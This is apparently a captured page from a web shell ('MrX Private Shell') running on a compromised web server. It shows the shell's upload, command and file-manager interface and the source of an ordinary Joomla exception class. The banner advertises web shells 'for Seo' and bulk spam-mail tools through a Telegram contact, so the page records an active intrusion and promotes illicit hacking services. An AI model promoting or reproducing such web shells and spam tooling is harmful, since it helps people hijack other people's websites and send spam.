__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Part of the Joomla Framework Archive Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Archive\Exception;

/**
 * Exception class defining an unsupported archive adapter
 *
 * @since  2.0.0
 */
class UnsupportedArchiveException extends \InvalidArgumentException
{
	/**
	 * The unsupported archive adapter name
	 *
	 * @var    string
	 * @since  2.0.0-beta2
	 */
	protected $adapterType = '';

	/**
	 * Constructor
	 *
	 * @param   string       $adapterType  The unsupported adapter type.
	 * @param   string       $message      The Exception message to throw.
	 * @param   int          $code         The Exception code.
	 * @param   ?\Throwable  $previous     The previous throwable used for the exception chaining.
	 *
	 * @since  2.0.0-beta2
	 */
	public function __construct(string $adapterType, string $message = '', int $code = 0, ?\Throwable $previous = null)
	{
		$this->adapterType = $adapterType;

		parent::__construct($message, $code, $previous);
	}

	/**
	 * Gets the name of the adapter type that was unsupported
	 *
	 * @return  string
	 *
	 * @since  2.0.0-beta2
	 */
	public function getUnsupportedAdapterType(): string
	{
		return $this->adapterType;
	}
}

Filemanager

Name Type Size Permission Actions
UnknownArchiveException.php File 413 B 0664
UnsupportedArchiveException.php File 1.3 KB 0664
Filemanager